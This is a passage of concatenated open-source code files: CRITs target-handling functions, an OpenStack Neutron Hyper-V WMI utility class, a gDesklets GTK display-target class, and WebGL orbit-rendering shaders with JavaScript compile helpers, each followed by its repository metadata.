target.add_ticket(ticket, analyst)
try:
target.save(username=analyst)
target.reload()
if is_new:
run_triage(target, analyst)
return {'success': True,
'message': "Target saved successfully",
'id': str(target.id)}
except ValidationError, e:
return {'success': False,
'message': "Target save failed: %s" % e}
def remove_target(email_address=None, analyst=None):
"""
Remove a target.
:param email_address: The email address of the target to remove.
:type email_address: str
:param analyst: The user removing the target.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str)
"""
if not email_address:
return {'success': False,
'message': "No email address to look up"}
target = Target.objects(email_address=email_address).first()
if not target:
return {'success': False,
'message': "No target matching this email address."}
target.delete(username=analyst)
return {'success': True,
'message': "Target removed successfully"}
def get_target_details(email_address, analyst):
"""
Generate the data to render the Target details template.
:param email_address: The email address of the target.
:type email_address: str
:param analyst: The user requesting this information.
:type analyst: str
:returns: template (str), arguments (dict)
"""
template = None
if not email_address:
template = "error.html"
args = {'error': "Must provide an email address."}
return template, args
# check for exact match first
target = Target.objects(email_address=email_address).first()
if not target: # if no exact match, look for case-insensitive match
target = Target.objects(email_address__iexact=email_address).first()
if not target:
target = Target()
target.email_address = email_address.strip().lower()
form = TargetInfoForm(initial={'email_address': email_address})
email_list = target.find_emails(analyst)
form = TargetInfoForm(initial=target.to_dict())
if form.fields.get(form_consts.Common.BUCKET_LIST_VARIABLE_NAME) != None:
form.fields.pop(form_consts.Common.BUCKET_LIST_VARIABLE_NAME)
if form.fields.get(form_consts.Common.TICKET_VARIABLE_NAME) != None:
form.fields.pop(form_consts.Common.TICKET_VARIABLE_NAME)
subscription = {
'type': 'Target',
'id': target.id,
'subscribed': is_user_subscribed("%s" % analyst,
'Target',
target.id)
}
#objects
objects = target.sort_objects()
#relationships
relationships = target.sort_relationships("%s" % analyst,
meta=True)
# relationship
relationship = {
'type': 'Target',
'value': target.id
}
#comments
if target.id:
comments = {'comments': target.get_comments(),
'url_key': email_address}
else:
comments = {'comments': [],
'url_key': email_address}
#screenshots
screenshots = target.get_screenshots(analyst)
# favorites
favorite = is_user_favorite("%s" % analyst, 'Target', target.id)
# analysis results
service_results = target.get_analysis_results()
args = {'objects': objects,
'relationships': relationships,
'relationship': relationship,
'comments': comments,
'favorite': favorite,
'subscription': subscription,
'screenshots': screenshots,
'email_list': email_list,
'target_detail': target,
'service_results': service_results,
'form': form}
return template, args
def get_campaign_targets(campaign, user):
"""
Get targets related to a specific campaign.
:param campaign: The campaign to search for.
:type campaign: str
:param user: The user requesting this information.
:type user: str
:returns: list
"""
# Searching for campaign targets
sourcefilt = user_sources(user)
# Get addresses from the 'to' field of emails attributed to this campaign
emails = Email.objects(source__name__in=sourcefilt,
campaign__name=campaign).only('to')
addresses = {}
for email in emails:
for to in email['to']:
addresses[to.strip().lower()] = 1 # add the way it should be
addresses[to] = 1 # also add the way it is in the Email
# Get addresses of Targets attributed to this campaign
targets = Target.objects(campaign__name=campaign).only('email_address')
for target in targets:
addresses[target.email_address] = 1
uniq_addrs = addresses.keys()
return uniq_addrs
def generate_target_jtable(request, option):
"""
Generate the jtable data for rendering in the list template.
:param request: The request for this jtable.
:type request: :class:`django.http.HttpRequest`
:param option: Action to take.
:type option: str of either 'jtlist', 'jtdelete', or 'inline'.
:returns: :class:`django.http.HttpResponse`
"""
refresh = request.GET.get("refresh", "no")
if refresh == "yes":
target_user_stats()
obj_type = Target
type_ = "target"
mapper = obj_type._meta['jtable_opts']
if option == "jtlist":
# Handle campaign listings
query = {}
if "campaign" in request.GET:
campaign = request.GET.get("campaign",None)
emails = get_campaign_targets(campaign, request.user.username)
query = {"email_address":{"$in": emails}}
# Sets display url
details_url = mapper['details_url']
details_url_key = mapper['details_url_key']
fields = mapper['fields']
response = jtable_ajax_list(obj_type, details_url, details_url_key,
request, includes=fields, query=query)
return HttpResponse(json.dumps(response,
default=json_handler),
content_type="application/json")
if option == "jtdelete":
response = {"Result": "ERROR"}
if jtable_ajax_delete(obj_type,request):
response = {"Result": "OK"}
return HttpResponse(json.dumps(response,
default=json_handler),
content_type="application/json")
jtopts = {
'title': "Targets",
'default_sort': mapper['default_sort'],
'listurl': reverse('crits.%ss.views.%ss_listing' %
(type_, type_), args=('jtlist',)),
'deleteurl': reverse('crits.%ss.views.%ss_listing' %
(type_, type_), args=('jtdelete',)),
'searchurl': reverse(mapper['searchurl']),
'fields': mapper['jtopts_fields'],
'hidden_fields': mapper['hidden_fields'],
'linked_fields': mapper['linked_fields'],
'details_link': mapper['details_link'],
'no_sort': mapper['no_sort']
}
jtable = build_jtable(jtopts,request)
jtable['toolbar'] = [
{
'tooltip': "'All Targets'",
'text': "'All'",
'click': "function () {$('#target_listing').jtable('load', {'refresh': 'yes'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'New Targets'",
'text': "'New'",
'click': "function () {$('#target_listing').jtable('load', {'refresh': 'yes', 'status': 'New'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'In Progress Targets'",
'text': "'In Progress'",
'click': "function () {$('#target_listing').jtable('load', {'refresh': 'yes', 'status': 'In Progress'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'Analyzed Targets'",
'text': "'Analyzed'",
'click': "function () {$('#target_listing').jtable('load', {'refresh': 'yes', 'status': 'Analyzed'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'Deprecated Targets'",
'text': "'Deprecated'",
'click': "function () {$('#target_listing').jtable('load', {'refresh': 'yes', 'status': 'Deprecated'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'Refresh target stats'",
'text': "'Refresh'",
'click': "function () {$.get('"+reverse('crits.%ss.views.%ss_listing' % (type_,type_))+"', {'refresh': 'yes'}); $('target_listing').jtable('load');}",
},
{
'tooltip': "'Add Target'",
'text': "'Add Target'",
'click': "function () {$('#new-target').click()}",
},
]
if option == "inline":
return render_to_response("jtable.html",
{'jtable': jtable,
'jtid': '%s_listing' % type_,
'button' : '%ss_tab' % type_},
RequestContext(request))
else:
return render_to_response("%s_listing.html" % type_,
{'jtable': jtable,
'jtid': '%s_listing' % type_},
RequestContext(request))
def generate_division_jtable(request, option):
"""
Generate the jtable data for rendering in the list template.
:param request: The request for this jtable.
:type request: :class:`django.http.HttpRequest`
:param option: Action to take.
:type option: str of either 'jtlist', 'jtdelete', or 'inline'.
:returns: :class:`django.http.HttpResponse`
"""
refresh = request.GET.get("refresh", "no")
if refresh == "yes":
target_user_stats()
if option == "jtlist":
limit = int(request.GET.get('jtPageSize',25))
skip = int(request.GET.get('jtStartIndex',0))
response = {}
response['Result'] = "OK"
fields = ["division","email_count","id","schema_version"]
response['TotalRecordCount'] = Division.objects().count()
response['Records'] = Division.objects().skip(skip).limit(limit).\
order_by("-email_count").only(*fields).to_dict()
#response['Records'] = [d.to_dict() for d in response['Records']]
return HttpResponse(json.dumps(response,
default=json_handler),
content_type="application/json")
type_ = "division"
jtopts = {
'title': "Divisions",
'default_sort': "email_count DESC",
'listurl': reverse('crits.targets.views.%ss_listing' % (type_,),
args=('jtlist',)),
'deleteurl': None,
'searchurl': None,
'fields': ["division","email_count","id"],
'hidden_fields': ["_id"],
'linked_fields': []
}
jtable = build_jtable(jtopts,request)
jtable['toolbar'] = [
{
'tooltip': "'Refresh division stats'",
'text': "'Refresh'",
'click': "function () {$.get('"+reverse('crits.targets.views.%ss_listing' % (type_))+"', {'refresh': 'yes'}); $('target_listing').jtable('load');}",
},
]
if option == "inline":
return render_to_response("jtable.html",
{'jtable': jtable,
'jtid': '%s_listing' % type_,
'button' : '%ss_tab' % type_},
RequestContext(request))
else:
return render_to_response("%s_listing.html" % type_,
{'jtable': jtable,
'jtid': '%s_listing' % type_},
RequestContext(request))
|
kaoscoach/crits
|
crits/targets/handlers.py
|
Python
|
mit
| 15,290
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Cloudbase Solutions SRL
# Copyright 2013 Pedro Navarro Perez
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# @author: Pedro Navarro Perez
# @author: Alessandro Pilotti, Cloudbase Solutions Srl
import sys
import time
from oslo.config import cfg
from neutron.common import exceptions as q_exc
from neutron.openstack.common import log as logging
# Check needed for unit testing on Unix
if sys.platform == 'win32':
import wmi
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class HyperVException(q_exc.NeutronException):
message = _('HyperVException: %(msg)s')
WMI_JOB_STATE_STARTED = 4096
WMI_JOB_STATE_RUNNING = 4
WMI_JOB_STATE_COMPLETED = 7
class HyperVUtils(object):
_ETHERNET_SWITCH_PORT = 'Msvm_SwitchPort'
_wmi_namespace = '//./root/virtualization'
def __init__(self):
self._wmi_conn = None
@property
def _conn(self):
if self._wmi_conn is None:
self._wmi_conn = wmi.WMI(moniker=self._wmi_namespace)
return self._wmi_conn
def get_switch_ports(self, vswitch_name):
vswitch = self._get_vswitch(vswitch_name)
vswitch_ports = vswitch.associators(
wmi_result_class=self._ETHERNET_SWITCH_PORT)
return set(p.Name for p in vswitch_ports)
def vnic_port_exists(self, port_id):
try:
self._get_vnic_settings(port_id)
except Exception:
return False
return True
def get_vnic_ids(self):
return set(
p.ElementName
for p in self._conn.Msvm_SyntheticEthernetPortSettingData()
if p.ElementName is not None)
def _get_vnic_settings(self, vnic_name):
vnic_settings = self._conn.Msvm_SyntheticEthernetPortSettingData(
ElementName=vnic_name)
if not vnic_settings:
raise HyperVException(msg=_('Vnic not found: %s') % vnic_name)
return vnic_settings[0]
def connect_vnic_to_vswitch(self, vswitch_name, switch_port_name):
vnic_settings = self._get_vnic_settings(switch_port_name)
if not vnic_settings.Connection or not vnic_settings.Connection[0]:
port = self.get_port_by_id(switch_port_name, vswitch_name)
if port:
port_path = port.Path_()
else:
port_path = self._create_switch_port(
vswitch_name, switch_port_name)
vnic_settings.Connection = [port_path]
self._modify_virt_resource(vnic_settings)
def _get_vm_from_res_setting_data(self, res_setting_data):
sd = res_setting_data.associators(
wmi_result_class='Msvm_VirtualSystemSettingData')
vm = sd[0].associators(
wmi_result_class='Msvm_ComputerSystem')
return vm[0]
def _modify_virt_resource(self, res_setting_data):
vm = self._get_vm_from_res_setting_data(res_setting_data)
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
(job_path, ret_val) = vs_man_svc.ModifyVirtualSystemResources(
vm.Path_(), [res_setting_data.GetText_(1)])
self._check_job_status(ret_val, job_path)
def _check_job_status(self, ret_val, jobpath):
"""Poll WMI job state for completion."""
if not ret_val:
return
elif ret_val not in [WMI_JOB_STATE_STARTED, WMI_JOB_STATE_RUNNING]:
raise HyperVException(msg=_('Job failed with error %d') % ret_val)
job_wmi_path = jobpath.replace('\\', '/')
job = wmi.WMI(moniker=job_wmi_path)
while job.JobState == WMI_JOB_STATE_RUNNING:
time.sleep(0.1)
job = wmi.WMI(moniker=job_wmi_path)
if job.JobState != WMI_JOB_STATE_COMPLETED:
job_state = job.JobState
if job.path().Class == "Msvm_ConcreteJob":
err_sum_desc = job.ErrorSummaryDescription
err_desc = job.ErrorDescription
err_code = job.ErrorCode
data = {'job_state': job_state,
'err_sum_desc': err_sum_desc,
'err_desc': err_desc,
'err_code': err_code}
raise HyperVException(
msg=_("WMI job failed with status %(job_state)d. "
"Error details: %(err_sum_desc)s - %(err_desc)s - "
"Error code: %(err_code)d") % data)
else:
(error, ret_val) = job.GetError()
if not ret_val and error:
data = {'job_state': job_state,
'error': error}
raise HyperVException(
msg=_("WMI job failed with status %(job_state)d. "
"Error details: %(error)s") % data)
else:
raise HyperVException(
msg=_("WMI job failed with status %d. "
"No error description available") % job_state)
desc = job.Description
elap = job.ElapsedTime
LOG.debug(_("WMI job succeeded: %(desc)s, Elapsed=%(elap)s"),
{'desc': desc, 'elap': elap})
def _create_switch_port(self, vswitch_name, switch_port_name):
"""Creates a switch port."""
switch_svc = self._conn.Msvm_VirtualSwitchManagementService()[0]
vswitch_path = self._get_vswitch(vswitch_name).path_()
(new_port, ret_val) = switch_svc.CreateSwitchPort(
Name=switch_port_name,
FriendlyName=switch_port_name,
ScopeOfResidence="",
VirtualSwitch=vswitch_path)
if ret_val != 0:
raise HyperVException(
msg=_('Failed creating port for %s') % vswitch_name)
return new_port
def disconnect_switch_port(
self, vswitch_name, switch_port_name, delete_port):
"""Disconnects the switch port."""
switch_svc = self._conn.Msvm_VirtualSwitchManagementService()[0]
switch_port_path = self._get_switch_port_path_by_name(
switch_port_name)
if not switch_port_path:
# Port not found. It happens when the VM was already deleted.
return
(ret_val, ) = switch_svc.DisconnectSwitchPort(
SwitchPort=switch_port_path)
if ret_val != 0:
data = {'switch_port_name': switch_port_name,
'vswitch_name': vswitch_name,
'ret_val': ret_val}
raise HyperVException(
msg=_('Failed to disconnect port %(switch_port_name)s '
'from switch %(vswitch_name)s '
'with error %(ret_val)s') % data)
if delete_port:
(ret_val, ) = switch_svc.DeleteSwitchPort(
SwitchPort=switch_port_path)
if ret_val != 0:
data = {'switch_port_name': switch_port_name,
'vswitch_name': vswitch_name,
'ret_val': ret_val}
raise HyperVException(
msg=_('Failed to delete port %(switch_port_name)s '
'from switch %(vswitch_name)s '
'with error %(ret_val)s') % data)
def _get_vswitch(self, vswitch_name):
vswitch = self._conn.Msvm_VirtualSwitch(ElementName=vswitch_name)
if not vswitch:
raise HyperVException(msg=_('VSwitch not found: %s') %
vswitch_name)
return vswitch[0]
def _get_vswitch_external_port(self, vswitch):
vswitch_ports = vswitch.associators(
wmi_result_class=self._ETHERNET_SWITCH_PORT)
for vswitch_port in vswitch_ports:
lan_endpoints = vswitch_port.associators(
wmi_result_class='Msvm_SwitchLanEndpoint')
if lan_endpoints:
ext_port = lan_endpoints[0].associators(
wmi_result_class='Msvm_ExternalEthernetPort')
if ext_port:
return vswitch_port
def set_vswitch_port_vlan_id(self, vlan_id, switch_port_name):
vlan_endpoint_settings = self._conn.Msvm_VLANEndpointSettingData(
ElementName=switch_port_name)[0]
if vlan_endpoint_settings.AccessVLAN != vlan_id:
vlan_endpoint_settings.AccessVLAN = vlan_id
vlan_endpoint_settings.put()
def _get_switch_port_path_by_name(self, switch_port_name):
vswitch = self._conn.Msvm_SwitchPort(ElementName=switch_port_name)
if vswitch:
return vswitch[0].path_()
def get_vswitch_id(self, vswitch_name):
vswitch = self._get_vswitch(vswitch_name)
return vswitch.Name
def get_port_by_id(self, port_id, vswitch_name):
vswitch = self._get_vswitch(vswitch_name)
switch_ports = vswitch.associators(
wmi_result_class=self._ETHERNET_SWITCH_PORT)
for switch_port in switch_ports:
if (switch_port.ElementName == port_id):
return switch_port
def enable_port_metrics_collection(self, switch_port_name):
raise NotImplementedError(_("Metrics collection is not supported on "
"this version of Hyper-V"))
|
ntt-sic/neutron
|
neutron/plugins/hyperv/agent/utils.py
|
Python
|
apache-2.0
| 9,859
|
from layout import Unit
from layout.LayoutObject import LayoutObject
from utils.datatypes import *
from utils.Struct import Struct
from DataTarget import DataTarget
from urllib import unquote
import utils
import gobject
import gtk
#
# Abstract class for DisplayTargets.
#
class DisplayTarget(DataTarget):
__slots__ = ('__layout_object', '_geometry_lock', '__anchor',
'__had_action', '__action_stamp', '__pushed_cursor')
# observer actions
OBS_GEOMETRY = 0
# user actions
ACTION_CLICK = "click"
ACTION_DOUBLECLICK = "doubleclick"
ACTION_PRESS = "press"
ACTION_RELEASE = "release"
ACTION_MENU = "menu"
ACTION_SCROLL = "scroll"
ACTION_ENTER = "enter"
ACTION_LEAVE = "leave"
ACTION_MOTION = "motion"
ACTION_FILE_DROP = "file-drop"
ACTION_LINK_DROP = "link-drop"
ACTION_KEY_PRESS = "key-press"
ACTION_KEY_RELEASE = "key-release"
# placement anchors
ANCHOR_NW = "nw"
ANCHOR_N = "n"
ANCHOR_NE = "ne"
ANCHOR_E = "e"
ANCHOR_SE = "se"
ANCHOR_S = "s"
ANCHOR_SW = "sw"
ANCHOR_W = "w"
ANCHOR_CENTER = "center"
# what we accept for drag & drop
__DND_FILE = [("text/uri-list", 0, 0)]
__DND_LINK = [("x-url/http", 0, 0), ("_NETSCAPE_URL", 0, 0)]
def __init__(self, name, parent):
# the action stamp helps us to detect ENTER and LEAVE events
self.__action_stamp = 0
# the queue of actions
self.__action_queue = []
# the layout object
self.__layout_object = parent.new_layout_object()
self.__layout_object.set_callback(self.__geometry_callback)
self.__layout_object.set_action_callback(self.__action_callback)
# the currently pushed mouse cursor
self.__pushed_cursor = None
# lock for geometry computations
self._geometry_lock = True
# the placement anchor
self.__anchor = self.ANCHOR_NW
# the value of the last notify_handle_action call
self.__had_action = False
DataTarget.__init__(self, name, parent)
for prop, datatype in [("x", TYPE_UNIT),
("y", TYPE_UNIT),
("width", TYPE_UNIT),
("height", TYPE_UNIT)]:
self._register_property(prop, datatype,
self._setp_geometry, self._getp_geometry)
self.set_prop("x", Unit.ZERO)
self.set_prop("y", Unit.ZERO)
self.set_prop("width", Unit.Unit())
self.set_prop("height", Unit.Unit())
self._register_property("relative-to", TYPE_LIST,
self._setp_relative_to, self._getp)
self._register_property("anchor", TYPE_STRING,
self._setp_anchor, self._getp)
self._register_property("cursor", TYPE_STRING,
self._setp_cursor, self._getp)
self._register_property("menu", TYPE_OBJECT,
self._setp_menu, None)
self._register_property("visible", TYPE_BOOL,
self._setp_visible, self._getp)
self._setp("visible", True)
for action in (self.ACTION_ENTER,
self.ACTION_LEAVE,
self.ACTION_CLICK,
self.ACTION_PRESS,
self.ACTION_RELEASE,
self.ACTION_SCROLL,
self.ACTION_FILE_DROP,
self.ACTION_LINK_DROP,
self.ACTION_DOUBLECLICK,
self.ACTION_MOTION,
self.ACTION_MENU,
self.ACTION_KEY_PRESS,
self.ACTION_KEY_RELEASE):
self._register_action(action)
#
# Creates and returns a new layout object as a child of this element's
# layout object.
#
def new_layout_object(self):
return self.__layout_object.new_child()
#
# Returns the layout object of this element.
#
def get_layout_object(self):
return self.__layout_object
#
# Callback handler for changes in the geometry.
#
def __geometry_callback(self, src, x, y, w, h):
self.get_widget().set_size_request(w.as_px(), h.as_px())
utils.request_call(self.update_observer, self.OBS_GEOMETRY)
#
# Callback handler for user actions.
#
def __action_callback(self, src, x, y, stamp, action, event):
self.detect_enter(stamp)
call = self.get_action_call(action)
if (call):
self.__action_queue.append((action, x, y, event))
utils.request_idle_call(self.__process_actions)
#
# Processes the remaining actions.
#
def __process_actions(self):
while (self.__action_queue):
action, x, y, event = self.__action_queue.pop()
self.handle_action(action, x, y, event)
#
# Detects and emits ENTER events.
#
def detect_enter(self, stamp):
if (not self.__action_stamp):
# send enter event
action = self.ACTION_ENTER
if (self.get_action_call(action)):
self.handle_action(action, Unit.ZERO, Unit.ZERO, Struct())
# change cursor
cursor = self._getp("cursor")
if (cursor):
self._get_display().push_cursor(cursor)
self.__pushed_cursor = cursor
self.__action_stamp = stamp
#
# Detects and emits LEAVE events.
#
def detect_leave(self, stamp):
if (self.__action_stamp and stamp != self.__action_stamp):
self.__action_stamp = 0
# send leave event
action = self.ACTION_LEAVE
if (self.get_action_call(action)):
self.handle_action(action, Unit.ZERO, Unit.ZERO, Struct())
# revert cursor
if (self.__pushed_cursor):
self._get_display().pop_cursor(self.__pushed_cursor)
self.__pushed_cursor = None
def _is_active(self): return (self.__action_stamp != 0)
def __on_file_drop(self, widget, context, x, y, data, info, time):
''' catch DND events and process them to send them to them
main display, which forwards them to the sensor '''
# get the display
display = self._get_display()
# tell the main display to send files and coordinates to the sensor
files = [unquote(uri) for uri in data.data.split("\r\n") if uri != '']
display.send_action(self, self.ACTION_FILE_DROP,
Struct(files = files, _args = [files]))
def __on_link_drop(self, widget, context, x, y, data, info, time):
''' catch DND events and process them to send them to them
main display, which forwards them to the sensor '''
# get the display
display = self._get_display()
# tell the main display to send link and coordinates to the sensor
links = [unquote(data.data.split("\n")[0])]
display.send_action(self, self.ACTION_LINK_DROP,
Struct(links = links, _args = [links]))
#
# Returns whether this target is standalone, i.e. needs no parent.
#
def is_standalone(self): return False
#
# Returns the widget of this target.
#
def get_widget(self): raise NotImplementedError
#
# Returns the true coordinates of this target when the given coordinates
# are the hotspot.
#
def get_anchored_coords(self, x, y, w, h):
assert (isinstance(x, Unit.Unit))
assert (isinstance(y, Unit.Unit))
assert (isinstance(w, Unit.Unit))
assert (isinstance(h, Unit.Unit))
if (x.is_unset() or y.is_unset()):
return (x, y)
anchor = self.__anchor
if (anchor in (self.ANCHOR_NW, self.ANCHOR_W, self.ANCHOR_SW)):
ax = x
elif (anchor in (self.ANCHOR_N, self.ANCHOR_CENTER, self.ANCHOR_S)):
ax = x - (w / 2)
else:
ax = x - w
if (anchor in (self.ANCHOR_NW, self.ANCHOR_N, self.ANCHOR_NE)):
ay = y
elif (anchor in (self.ANCHOR_W, self.ANCHOR_CENTER, self.ANCHOR_E)):
ay = y - (h / 2)
else:
ay = y - h
return (ax, ay)
#
# Returns the geometry (coordinates and size) of this target.
#
def get_geometry(self):
x, y, w, h = self.__layout_object.get_real_geometry()
if (self.get_prop("visible")):
return (x, y, w, h)
else:
return (x, y, Unit.ZERO, Unit.ZERO)
#
# Returns the geometry from the user's point of view.
#
def get_user_geometry(self):
return self.__layout_object.get_geometry() #self.__user_geometry
#
# Sets the position of this target.
#
def set_position(self, x, y):
assert (isinstance(x, Unit.Unit))
assert (isinstance(y, Unit.Unit))
ox, oy, w, h = self.__layout_object.get_geometry()
if ((x, y) != (ox, oy)):
self.__layout_object.set_geometry(x = x, y = y)
#
# Sets the size of this target. Use this instead of set_size_request() in
# targets to set the size manually.
#
def set_size(self, width, height):
assert (isinstance(width, Unit.Unit))
assert (isinstance(height, Unit.Unit))
x, y, w, h = self.__layout_object.get_geometry()
if ((w, h) != (width, height)):
if (w.get_unit() != Unit.UNIT_PERCENT):
self.__layout_object.set_geometry(width = width)
if (h.get_unit() != Unit.UNIT_PERCENT):
self.__layout_object.set_geometry(height = height)
def handle_action(self, action, px, py, event):
assert (isinstance(px, Unit.Unit))
assert (isinstance(py, Unit.Unit))
# we need the pointer position relative to the widget, so we have to
# setup a new event structure for some actions
if (action in (self.ACTION_CLICK, self.ACTION_DOUBLECLICK,
self.ACTION_MOTION, self.ACTION_PRESS,
self.ACTION_RELEASE)):
x, y = self.get_widget().get_pointer()
nil, nil, w, h = self.get_geometry()
ux = Unit.Unit(x, Unit.UNIT_PX)
uy = Unit.Unit(y, Unit.UNIT_PX)
if (w.as_px() > 0): ux.set_100_percent(w.as_px())
if (h.as_px() > 0): uy.set_100_percent(h.as_px())
event["x"] = ux
event["y"] = uy
# FIXME: remove eventually :)
if (action == self.ACTION_MOTION): event["_args"] = [x, y]
DataTarget.handle_action(self, action, px, py, event)
#
# Geometry properties.
#
def _setp_geometry(self, key, value):
assert (isinstance(value, Unit.Unit))
if (key == "x"):
self.__layout_object.set_geometry(x = value)
self._setp(key, value)
elif (key == "y"):
self.__layout_object.set_geometry(y = value)
self._setp(key, value)
elif (key == "width"):
self.__layout_object.set_geometry(width = value)
self._setp(key, value)
elif (key == "height"):
self.__layout_object.set_geometry(height = value)
self._setp(key, value)
def _setp_relative_to(self, key, value):
name, mode = value
if (mode == "x"): rx, ry = True, False
elif (mode == "y"): rx, ry = False, True
elif (mode == "xy"): rx, ry = True, True
else: rx, ry = False, False
def f():
try:
parent = self._get_parent()
my_id = self._getp("id")
if (not parent or not parent.get_child_by_id(my_id)):
return
obj = self._get_parent().get_child_by_id(name)
# if it is not a child of our parent and not the parent itself, something is wrong
if (not obj and not (parent._getp("id") == name)):
raise UserError(_("Element \"%s\" does not exist") % name,
_("The <tt>relative-to</tt> property "
"requires a reference to an existing "
"display element within the same parent "
"container."))
# FIXME ?! So far 'relative-to' only works for "siblings".
# Would a 'relative-to' parents make any sense ?!
if obj:
relative = obj.get_layout_object()
self.__layout_object.set_relative_to(relative, rx, ry)
except:
import traceback; traceback.print_exc()
pass
# we have to delay because the relative might not be available at that
# time
utils.request_call(f)
self._setp(key, value)
def _setp_anchor(self, key, value):
self.__anchor = value
if (value in (self.ANCHOR_NW, self.ANCHOR_W, self.ANCHOR_SW)):
ax = 0.0
elif (value in (self.ANCHOR_N, self.ANCHOR_CENTER, self.ANCHOR_S)):
ax = 0.5
else:
ax = 1.0
if (value in (self.ANCHOR_NW, self.ANCHOR_N, self.ANCHOR_NE)):
ay = 0.0
elif (value in (self.ANCHOR_W, self.ANCHOR_CENTER, self.ANCHOR_E)):
ay = 0.5
else:
ay = 1.0
self.__layout_object.set_anchor(ax, ay)
self._setp(key, value)
def _getp_geometry(self, key):
x, y, w, h = self.__layout_object.get_real_geometry()
if (key == "x"):
unit = x
elif (key == "y"):
unit = y
elif (key == "width"):
unit = w
elif (key == "height"):
unit = h
return unit
#
# "visible" property.
#
def _setp_visible(self, key, value):
if (value): self.get_widget().show()
else: self.get_widget().hide()
self.__layout_object.set_enabled(value)
self._setp(key, value)
#
# "menu" property.
#
def _setp_menu(self, key, value):
dsp = self._get_display()
utils.request_call(dsp.open_menu, value)
#
# Action handlers.
#
def _setp__action(self, key, value):
DataTarget._setp__action(self, key, value)
if (key == "on-file-drop"):
self.get_widget().drag_dest_set(gtk.DEST_DEFAULT_ALL,
self.__DND_FILE,
gtk.gdk.ACTION_COPY)
self.get_widget().connect("drag_data_received",
self.__on_file_drop)
elif (key == "on-link-drop"):
self.get_widget().drag_dest_set(gtk.DEST_DEFAULT_ALL,
self.__DND_LINK,
gtk.gdk.ACTION_COPY)
self.get_widget().connect("drag_data_received",
self.__on_link_drop)
#
# "cursor" property.
#
def _setp_cursor(self, key, value):
self._setp(key, value)
if (self.__pushed_cursor):
self._get_display().pop_cursor(self.__pushed_cursor)
self._get_display().pop_cursor(value)
self.__pushed_cursor = value
#
# Unlocks the initial lock for geometry computations.
# By locking the geometry engine initially, we can build up the display
# without redundant geometry computations. The necessary computations are
# done once when unlocking.
#
def unlock_geometry(self):
self._geometry_lock = False
#
# Returns whether the geometry engine is locked.
#
def _is_geometry_locked(self):
return self._geometry_lock
|
RaumZeit/gdesklets-core
|
display/DisplayTarget.py
|
Python
|
gpl-2.0
| 15,981
|
shader_code = """
<script id="orbit_shader-vs" type="x-shader/x-vertex">
uniform vec3 focus;
uniform vec3 aef;
uniform vec3 omegaOmegainc;
attribute float lintwopi;
varying float lin;
uniform mat4 mvp;
const float M_PI = 3.14159265359;
void main() {
float a = aef.x;
float e = aef.y;
float f = aef.z+lintwopi;
lin = lintwopi/(M_PI*2.);
if (e>1.){
float theta_max = acos(-1./e);
f = 0.0001-theta_max+1.9998*lin*theta_max;
lin = sqrt(min(0.5,lin));
}
float omega = omegaOmegainc.x;
float Omega = omegaOmegainc.y;
float inc = omegaOmegainc.z;
float r = a*(1.-e*e)/(1. + e*cos(f));
float cO = cos(Omega);
float sO = sin(Omega);
float co = cos(omega);
float so = sin(omega);
float cf = cos(f);
float sf = sin(f);
float ci = cos(inc);
float si = sin(inc);
vec3 pos = vec3(r*(cO*(co*cf-so*sf) - sO*(so*cf+co*sf)*ci),r*(sO*(co*cf-so*sf) + cO*(so*cf+co*sf)*ci),+ r*(so*cf+co*sf)*si);
gl_Position = mvp*(vec4(focus+pos, 1.0));
}
</script>
<script id="orbit_shader-fs" type="x-shader/x-fragment">
precision mediump float;
varying float lin;
void main() {
float fog = max(max(0.,-1.+2.*gl_FragCoord.z),max(0.,1.-2.*gl_FragCoord.z));
gl_FragColor = vec4(1.,1.,1.,sqrt(lin)*(1.-fog));
}
</script>
<script id="point_shader-vs" type="x-shader/x-vertex">
attribute vec3 vp;
uniform mat4 mvp;
//uniform vec4 vc;
//varying vec4 color;
void main() {
gl_PointSize = 15.0;
gl_Position = mvp*vec4(vp, 1.0);
//color = vc;
}
</script>
<script id="point_shader-fs" type="x-shader/x-fragment">
precision mediump float;
//varying vec4 color;
void main() {
vec2 rel = gl_PointCoord.st;
rel.s -=0.5;
rel.t -=0.5;
if (length(rel)>0.25){
gl_FragColor = vec4(0.,0.,0.,0.);
}else{
vec4 cmod = vec4(1.,1.,1.,1.);
float fog = max(max(0.,-1.+2.*gl_FragCoord.z),max(0.,1.-2.*gl_FragCoord.z));
cmod.a*= (1.-fog)*min(1.,1.-4.*(length(rel)/0.25-0.75));
gl_FragColor = cmod;
}
}
</script>
"""
js_code = """
<script>
function compileShader(glr, shaderSource, shaderType) {
// Create the shader object
var shader = glr.createShader(shaderType);
// Set the shader source code.
glr.shaderSource(shader, shaderSource);
// Compile the shader
glr.compileShader(shader);
// Check if it compiled
var success = glr.getShaderParameter(shader, glr.COMPILE_STATUS);
if (!success) {
// Something went wrong during compilation; get the error
throw "could not compile shader:" + glr.getShaderInfoLog(shader);
}
return shader;
}
function createShaderFromScript(glr, scriptId, opt_shaderType) {
// look up the script tag by id.
var shaderScript = document.getElementById(scriptId);
if (!shaderScript) {
throw("*** Error: unknown script element" + scriptId);
}
// extract the contents of the script tag.
var shaderSource = shaderScript.text;
// If we didn't pass in a type, use the 'type' from
// the script tag.
if (!opt_shaderType) {
if (shaderScript.type == "x-shader/x-vertex") {
opt_shaderType = glr.VERTEX_SHADER;
} else if (shaderScript.type == "x-shader/x-fragment") {
opt_shaderType = glr.FRAGMENT_SHADER;
} else if (!opt_shaderType) {
throw("*** Error: shader type not set");
}
}
return compileShader(glr, shaderSource, opt_shaderType);
};
function createProgramFromScripts( glr, vertexShaderId, fragmentShaderId) {
